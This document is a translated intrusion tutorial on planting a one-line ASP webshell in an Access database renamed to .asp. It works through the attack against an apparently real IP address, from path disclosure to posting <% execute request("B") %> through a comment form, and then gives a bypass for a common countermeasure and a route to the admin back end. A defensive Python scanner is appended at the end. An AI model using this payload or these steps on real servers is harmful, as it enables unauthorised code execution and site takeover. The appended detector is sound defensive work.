It may be that, as network security technology develops, the skill of administrators is improving. In an Access + ASP system, the MDB file is commonly renamed to .asp or .asa so that the database cannot be downloaded. If the suffix is not changed, the database can be downloaded directly with tools such as quickshield. But renaming it actually opens the door to intruders: a database with an .asp or .asa suffix can be used directly to obtain a webshell.
I. Idea
As everyone knows, <% and %> are the delimiters of ASP code: an ASP file executes only the code between <% and %>. In an Access + ASP web system, all data is stored in the database file (the MDB file). Because the administrator has renamed the MDB file to an ASP file, any submitted data that contains <% ... %> is executed as code when the ASP "database" is requested. So we only need to submit malicious code into the database, and the database with the .asp suffix becomes our webshell.
II. Example
Pick a target at random. First, let's locate a database with an ASP suffix:
http://220.170.151.103/test/dlog%5cshowlog.asp?cat_id=5&log_id=210
The server returns:
Microsoft VBScript compiler error '800a03f6'
Expected 'End'
/iisHelp/common/500-100.asp, line 242
Microsoft JET Database Engine error '20140901'
'D:/log_mdb/%29dlog_mdb%29.asp' is not a valid path. Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.
/test/conn.asp, line 18
We submit http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp and the server returns a stream of garbled characters, so the database could be downloaded directly with a tool such as Internet Express (not discussed here). On the homepage we can see that a "user comments" function is provided. We register a user and post a comment:
<% Execute request ("B") %>
In this way the ASP code <% execute request("B") %> is written into the database, and the database becomes our webshell. Request http://220.170.151.103/test/dlog/log_mdb/%2529dlog_mdb%2529.asp again, and at the end of the garbled text we see:
/iisHelp/common/500-100.asp, line 242
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'execute'
/test/dlog/log_mdb/%29dlog_mdb%29.asp, line 1266
This error shows that the inserted code is being executed (execute ran, but no "B" parameter was supplied). For example:
Note: the code submitted to the database cannot be too long, which is why we use the short <% execute request("B") %>.
III. Other questions and ideas
1. If the suffix is changed to ASP, invalid ASP code such as <%='a'-1%> can be added to the database to stop the downloaded database from being usable at all: because the database contains invalid ASP code, inserting our webshell code and requesting the file only displays the error from the earlier invalid code, rather than executing our shell code. Although this can prevent some attacks, hidden risks remain: we only need to add compatible error code before the invalid code, and the inserted webshell code is then displayed correctly.
2. For MDB files whose suffix has not been changed, we can download the database, obtain the admin password and log in to the back end, then use the database backup function to change the suffix to ASP.
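A defender-side check for the weakness described in sections I and III, added here as an example that is not part of the original article: it walks a web root, identifies Jet/Access database files by their file header rather than their extension, and flags any that are served under a script extension or already contain <% ... %> delimiters (whether a planted shell or the "invalid code" trick from item III.1, both of which mean the file is being treated as script). The SCRIPT_EXTS set and the sample bytes are assumptions; the real fix is to keep the database outside the web root entirely.

```python
import os
import re

# Jet/Access databases begin with 4 bytes (00 01 00 00) followed by this marker.
JET_MARKER = b"Standard Jet DB"
ACE_MARKER = b"Standard ACE DB"   # newer .accdb files use this marker
# Extensions the article describes being mapped to the ASP engine; this set is
# an assumption and should be adjusted to the server's actual script mappings.
SCRIPT_EXTS = {".asp", ".asa"}
ASP_BLOCK = re.compile(rb"<%.*?%>", re.DOTALL)


def is_access_database(data: bytes) -> bool:
    """Recognise a Jet/ACE database by its header, ignoring the file name."""
    return data[4:19] in (JET_MARKER, ACE_MARKER)


def classify(path: str, data: bytes) -> list:
    """Return the findings for one file that lives under the web root."""
    findings = []
    if not is_access_database(data):
        return findings
    # Any database under the web root is downloadable; that alone is a finding.
    findings.append("database-under-webroot")
    ext = os.path.splitext(path)[1].lower()
    if ext in SCRIPT_EXTS:
        # IIS parses this file as ASP, so stored <% ... %> text becomes code.
        findings.append("database-with-script-extension")
    blocks = ASP_BLOCK.findall(data)
    if blocks:
        findings.append("asp-delimiters-in-database:%d" % len(blocks))
    return findings


def scan_webroot(root: str) -> dict:
    """Walk a web root and map each flagged database file to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                data = fh.read()
            findings = classify(full, data)
            if findings:
                report[full] = findings
    return report
```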